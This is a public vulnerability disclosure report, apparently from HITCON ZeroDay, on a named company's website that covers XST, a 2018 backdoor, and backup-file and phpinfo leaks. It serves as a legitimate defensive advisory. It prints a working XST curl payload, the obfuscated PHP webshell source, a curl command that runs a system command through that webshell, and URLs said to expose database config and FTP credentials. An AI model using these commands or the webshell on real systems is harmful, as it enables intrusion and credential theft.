Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2026-00131
- 發信 Vendor: 清河國際股份有限公司
- Title: 清河國際股份有限公司 網站存在 XST + 發現入侵痕跡 + Verbose Error Messages + Backup File Leak + phpinfo Leak
- Introduction: 網站存在 XST + 發現入侵痕跡 + Verbose Error Messages + Backup File Leak + phpinfo Leak
處理狀態
目前狀態
公開
Last Update : 2026/04/11
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2026/01/26 15:08:42 : 新提交 (由 BTtea 更新此狀態)
- 2026/01/26 15:11:19 : 新提交 (由 BTtea 更新此狀態)
- 2026/01/27 13:09:57 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/01/29 16:27:37 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/01/29 16:27:37 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/01/29 16:27:37 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/04/11 03:00:18 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2026-00131
- 通報者:blacktea_player (BTtea)
- 風險:嚴重
- 類型:遠端命令執行 (Remote Code Execution)
參考資料
攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection
漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection
漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html
漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://www.healthstream.com.tw/index.php
https://www.healthstream.com.tw/conf/db.conf.php.bak
https://www.healthstream.com.tw/include/class/mysql.class.php.bak
https://www.healthstream.com.tw/include/function/email.fun.php.bak
https://www.healthstream.com.tw/include/function/email.fun.php.tony
https://www.healthstream.com.tw/WebAdmin/web/product.list.php.bak
https://www.healthstream.com.tw/deconfig.asp
https://www.healthstream.com.tw/infotest.php
https://www.healthstream.com.tw/phpinfo.php
https://www.healthstream.com.tw/example/default.php
https://www.healthstream.com.tw/conf/db.conf.php.bak
https://www.healthstream.com.tw/include/class/mysql.class.php.bak
https://www.healthstream.com.tw/include/function/email.fun.php.bak
https://www.healthstream.com.tw/include/function/email.fun.php.tony
https://www.healthstream.com.tw/WebAdmin/web/product.list.php.bak
https://www.healthstream.com.tw/deconfig.asp
https://www.healthstream.com.tw/infotest.php
https://www.healthstream.com.tw/phpinfo.php
https://www.healthstream.com.tw/example/default.php
敘述
-
XST
-
https://www.healthstream.com.twHTTP 可接受 TRACE 過舊的協議,可利用於 XST 攻擊
XST payloadcurl -ik https://www.healthstream.com.tw -X TRACE -H "XST: <script>alert(1)</script>"運行結果
-
-
發現入侵痕跡
-
https://www.healthstream.com.tw/example/default.php使用 ZD-2026-00130 或 ZD-2026-00128 的 RCE 情境在確認是否有異常檔案時,果然發現在2018年有一個入侵痕跡留下的後門,程式碼如下
<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["m0os"]); ?>經測試,使用下方語法確實可 RCE,建議檢查是否有其他已在運行中的惡意檔案
curl -ik "https://www.healthstream.com.tw/example/default.php" --data "m0os=print(%60%24_POST[0]%60);&0=ver"運行結果
-
-
Verbose Error Messages
-
https://www.healthstream.com.tw/index.php?act=index於開發環境開發完畢後,未關閉錯誤訊息顯示
運行結果
-
-
Backup File Leak
-
https://www.healthstream.com.tw/conf/db.conf.php.bak https://www.healthstream.com.tw/include/class/mysql.class.php.bak https://www.healthstream.com.tw/include/function/email.fun.php.bak https://www.healthstream.com.tw/include/function/email.fun.php.tony https://www.healthstream.com.tw/WebAdmin/web/product.list.php.bak https://www.healthstream.com.tw/deconfig.asp可存取備份檔案參考原始碼
payloadcurl "https://www.healthstream.com.tw/conf/db.conf.php.bak"運行結果
-
-
phpinfo Leak
-
https://www.healthstream.com.tw/infotest.php https://www.healthstream.com.tw/phpinfo.php洩漏伺服器後端資訊,如實體路徑,版本資訊,PHP 設定資訊等等
運行結果
-
無意義但不應該被存取的站點目錄可能導致資訊洩漏或其他危害
https://www.healthstream.com.tw/hitech-120202.txt (洩漏 ftp 帳密)
https://www.healthstream.com.tw/hitech.txt (洩漏 ftp 帳密)
https://www.healthstream.com.tw/hitech2.txt (洩漏 ftp 帳密)
https://www.healthstream.com.tw/IntenzaiBikeData.txt
https://www.healthstream.com.tw/IntenzaiBikeData.txt
https://www.healthstream.com.tw/IntenzaiVersionCheck.txt
https://www.healthstream.com.tw/googleac691f5d3e147a51.html
https://www.healthstream.com.tw/thumbs.db (windows 圖片快取文件)
https://www.healthstream.com.tw/flash-products.swf (swf 文件)
https://www.healthstream.com.tw/test.html (測試文件未移除)
https://www.healthstream.com.tw/chat.html (測試文件未移除)
https://www.healthstream.com.tw/chat%20_OLD.html (測試文件未移除)
https://www.healthstream.com.tw/.well-known/pki-validation/02C718008458225EA6003CBFB6805F98.txt
文件過多不一一列舉| 弱點名稱 | CVSS 3.1 (score & vector) | CWE 分類 |
|---|---|---|
| XST | 4.3 (中) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N | CWE 不適用 |
| 入侵痕跡 | 10.0 (嚴重) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | CWE 不適用 |
| Verbose Error Messages | 5.3 (中) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N | CWE-209 |
| Backup File Leak | 7.5 (高) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | CWE-200 |
| phpinfo Leak | 5.3 (中) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N | CWE-200 |
修補建議
XST
* https://en.wikipedia.org/wiki/Cross-site_tracing
* https://owasp.org/www-community/attacks/Cross_Site_Tracing
入侵痕跡
* 建議立即移除該後門
* 建議檢查伺服器內是否有被安裝惡意程式
* 建議查看是否有辦法回朔至 2018 年的相關 log 調取事件紀錄
* 建議檢查相關伺服器備份或者映像檔是否包含後門文件
Verbose Error Messages
* 關閉錯誤訊息顯示
Backup File Leak
* 移除備份與測試文件
phpinfo Leak
* 移除 phpinfo 文件
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。